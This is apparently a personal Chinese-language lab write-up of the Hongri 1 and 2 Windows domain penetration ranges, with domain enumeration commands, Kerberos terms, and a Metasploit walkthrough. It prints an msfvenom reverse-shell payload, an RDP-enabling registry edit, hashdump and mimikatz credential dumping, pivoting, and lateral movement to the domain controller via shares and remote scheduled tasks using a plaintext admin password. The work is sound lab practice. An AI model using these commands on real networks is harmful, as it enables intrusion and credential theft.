background

看了官网放的红日一解 感觉之前自己做的太浅了 网上很多文章也是很浅 参考https://mp.weixin.qq.com/s/A3MIuT7RXTIIPNLjF42OTg

记录下一些内网常用的命令

ipconfig /all   # 查看本机ip,所在域
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" # 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" # 建立c盘共享
dir \\192.168.xx.xx\c$\user # 查看192.168.xx.xx c盘user目录下的文件

net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器(可能有多台)

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL=" 用Ping命令探测内网主机
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #开3389

Windows域安全基本名词

域控制器(Domain Controller,DC):在域中至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样。 

密钥分发中心(Key Distribution Center,KDC):KDC维护着域中所有安全主体(SecurityPrincipal)账户信息数据库,负责管理票据、认证票据、分发票据。 

帐户数据库(Account Database,AD):一个类似于 Windows本机SAM的数据库,存储了域内所有网络对象的凭证,也存储所有Client的白名单,在白名单中的 Client才可以申请到TGT。 

身份验证服务(Authentication Service,AS):用于生成TGT的服务。 

票据发放服务(Ticket Granting Service,TGS):用于生成某个服务的ticket

认证票据(Ticket Granting Ticket,TGT):可以理解为入场券,通过入场券能够获得票据,是一种临时凭证的存在。 

票据(Ticket):网络对象互相访问的凭证。 

Master Key :长期密钥(被 Hash加密的用户密钥),这里指 NTLM Hash,简单理解就是Windows加密过的密码口令。 

Session Key :短期会话密钥。

krbtgt 账户:每个域控制器都有一个 krbtgt的用户账户,是 KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。
作者:蜗牛学苑 https://www.bilibili.com/read/cv15702405/ 出处:bilibili

kerberos认证中的三个角色

Client
Server
KDC (DC) :在Windows域环境中,KDC的角色由DC承担。
作者:蜗牛学苑 https://www.bilibili.com/read/cv15702405/ 出处:bilibili

认证过程

Client向KDC的AS服务发送请求,希望获取访问Server的权限。KDC收到请求后,通过在帐户数据库AD中存储黑名单和白名单来区分Client是否可信。确认成功后,AS返回TGT给Client。 
Client得到了TGT后,继续向KDC的TGS服务发送请求,希望获取访问 Server的权限。KDC通过客户端请求信息中的TGT判断客户端是否拥有权限,确认成功返回访问Server的权限ticket。
Client得到ticket后,Client与Server二者进行相互验证,成功后,Client就可以访问Server的资源。
作者:蜗牛学苑 https://www.bilibili.com/read/cv15702405/ 出处:bilibili

1730773485379

自己也不会用msf去横向 于是重做一次红日一 之前写的也挺烂的

红日一温习

哥斯拉里直接load go即可 msf照着上面配置

image-20241104165323756

但是这样不稳定 还是生成个马子回连

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.30.135 lport=4444 -f exe -o wxiaoge.exe 

监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.30.135
set lport 4444

开3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

msf关闭防火墙

run post/windows/manage/enable_rdp

获取system权限

getsystem

获取哈希

hashdump
run post/windows/gather/smart_hashdump

猕猴桃模块

load kiwi 				#加载kiwi模块
help kiwi #查看kiwi模块的使用
creds_all: #列举所有凭据
creds_kerberos: #列举所有kerberos凭据
creds_msv: #列举所有msv凭据
creds_ssp: #列举所有ssp凭据
creds_tspkg: #列举所有tspkg凭据
creds_wdigest: #列举所有wdigest凭据
dcsync: #通过DCSync检索用户帐户信息
dcsync_ntlm: #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create: #创建黄金票据
kerberos_ticket_list: #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use: #使用kerberos票据
kiwi_cmd: #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam: #dump出lsa的SAM
lsa_dump_secrets: #dump出lsa的密文
password_change: #修改密码
wifi_list: #列出当前用户的wifi配置文件
wifi_list_shared: #列出共享wifi配置文件/编码

image-20241104194550346

这里的administrator god是域管理员 也就是这个密码可以登录域内所有机器 如果没做限制的话

这个密码修改的时候是会经过域控的 域控关机这个密码就修改不了 这个密码一修改域内所有机器的都会变

ping命令探测存活

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="

搭建代理

run autoroute -s 192.168.52.0/24

查看

run autoroute -p

挂起

background

正常流程扫描 后面配置代理这些没啥讲的

image-20241104200632406

这里有了域管的密码 但是域控没开3389上不了桌面 可以psexec上去 这里还有个思路 开启共享文件

连接域控共享目录

net use \\192.168.52.138\c$ "Liu78963" /user:"administrator"

传马

copy mazi.exe \\192.168.52.138\c$

其实在桌面里直接图形化页面输入就能看到

image-20241104204226242

定时任务也支持远程下发

shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st 18:05 /S 192.168.52.138 /RU System  /u administrator /p "Liu78963"

这就算是拿下域控了 不过好像 确实没啥东西 msf没cs方便啊

红日二

参考 https://mp.weixin.qq.com/s/x6-i7LF_Zy0gPSnutaNmpg

这里没搞懂为什么pc机 win7要出网 然后这里模拟互联网地址的nat网卡全部设置静态了 我删了新增了nat的网卡

1730725585013

打点

wp上写的是7001有weblogic能直接rce 但是我这里7001端口没起来 1433端口起了 就不管了 一把🔒的口子没啥好讲的

直接上cs 主机里的360也是奇葩

image-20241104215105940

确实是断网了就废了

image-20241104215132297

这系列的靶机都有360 还得看免杀 实战基本就是拿到域管密码就完事了

image-20241105203728279